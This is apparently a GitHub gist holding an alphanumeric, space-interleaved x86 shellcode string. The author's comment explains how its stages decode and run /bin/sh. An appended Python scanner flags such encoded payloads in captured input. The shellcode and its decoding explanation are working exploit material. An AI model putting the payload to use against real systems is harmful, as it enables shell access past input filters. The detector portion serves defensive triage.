@stong
Created June 19, 2019 13:46
5 c at 5 b at jut Yet At At At At At At At At At At At At Pt Pt jut jut jut jut Qt jut at 111 1 t t t t t t t t t t t t t t t t Pt Pt Pt Pt jut j j j j at Bet At j Qt Rt St j j j j at 4 Kt Qt Qt Rt St j j Pt j at 311 1 t t 321 1 111 1 Bet Bet At t Qt Yet u h a a a a Q X 4 y P Y I I I I I I I I I I I I I I I I I 7 Q Z j A X P 0 A 0 A k A A Q 2 A B 2 B B 0 B B A B X P 8 A B u J I 4 q Y P M I F 0 u 8 V O v O 3 C 5 8 U 8 T o P b b I 2 N l I i s R p q C K 9 y q N P d K z m m P A A X X X X X X X X X X X X X

stong commented Jun 23, 2019

Explanation of the shellcode:

  • First part constructs a negative 8-bit number (>0x7f), then overwrites the operand of a jmp8 instruction with it so we can have a backwards jump.
  • Part two is the loop that we just completed, and it removes every other byte from the third stage that directly follows it. The third stage is an alphanumeric binsh shellcode, but interleaved with spaces so each character is its own word.
  • Part three is an imul-encoded /bin/sh shellcode that decodes itself and executes the final payload.

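The comment above gives two textual fingerprints that a triage tool can look for in captured input: a long run restricted to alphanumeric bytes, and a region where every whitespace-separated "word" is a single character (the space-interleaved third stage). The scanner below is an added example for defenders, not code from the gist or its author; the thresholds, the sample buffer and the alphabet stand-in for the interleaved region are constructed assumptions, and the unbroken-run signal is deliberately reported separately because hashes and base64 blobs trip it too.

```python
"""Heuristic scan for the two textual fingerprints described in the gist comment:
(1) a long run drawn only from [A-Za-z0-9 ], and (2) a run in which nearly every
whitespace-separated token is a single byte. Constructed triage example."""
import re
from typing import Dict, List

# Thresholds are assumptions chosen for this example, not values from the gist.
MIN_RUN_LEN = 40          # shortest [A-Za-z0-9 ] run worth looking at
SINGLE_CHAR_RATIO = 0.8   # share of one-byte "words" that triggers a finding

_RUN_RE = re.compile(rb"[A-Za-z0-9 ]{%d,}" % MIN_RUN_LEN)


def alnum_runs(data: bytes) -> List[Dict]:
    """Every maximal run of alphanumeric/space bytes at least MIN_RUN_LEN long."""
    return [{"offset": m.start(), "text": m.group()} for m in _RUN_RE.finditer(data)]


def single_char_word_ratio(run: bytes) -> float:
    """Fraction of whitespace-separated tokens that are exactly one byte long."""
    tokens = run.split()
    if not tokens:
        return 0.0
    return sum(1 for t in tokens if len(t) == 1) / len(tokens)


def longest_token(run: bytes) -> int:
    """Length of the longest whitespace-free token inside the run."""
    return max((len(t) for t in run.split()), default=0)


def classify_run(run: bytes) -> List[str]:
    """Reasons a run resembles the encoder output the comment describes."""
    reasons = []
    if single_char_word_ratio(run) >= SINGLE_CHAR_RATIO:
        # Stage-3 fingerprint: payload bytes interleaved with spaces, one byte per word
        reasons.append("space-interleaved single-character words")
    if longest_token(run) >= MIN_RUN_LEN:
        # Weak signal on its own: hex digests and base64 also look like this
        reasons.append("long unbroken alphanumeric token")
    return reasons


def scan(data: bytes) -> List[Dict]:
    """Return one finding per run that matches at least one heuristic."""
    findings = []
    for run in alnum_runs(data):
        reasons = classify_run(run["text"])
        if reasons:
            findings.append({"offset": run["offset"],
                             "length": len(run["text"]),
                             "reasons": reasons})
    return findings


# Constructed sample buffer: HTTP header text, a benign sentence, a hex digest,
# and a stand-in for the space-interleaved region (plain alphabet, not shellcode).
INTERLEAVED = b" ".join(
    bytes([c]) for c in b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
)
SAMPLE = (
    b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
    + b"ETag: " + b"0123456789abcdef" * 4 + b"\r\n\r\n"
    + b"<p>The quick brown fox jumps over the lazy dog, again and again.</p>\n"
    + INTERLEAVED + b"\r\n"
)

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"offset {f['offset']:#x} len {f['length']}: {', '.join(f['reasons'])}")
```

Run against the constructed buffer, the benign sentence is a 43-byte alphanumeric run but produces no finding, the hex digest is reported only under the weak unbroken-token reason, and the interleaved region is reported under the single-character-word reason; in practice the second reason is the one worth an analyst's time, and the first is a prompt to check whether the token decodes as a hash or base64 before escalating.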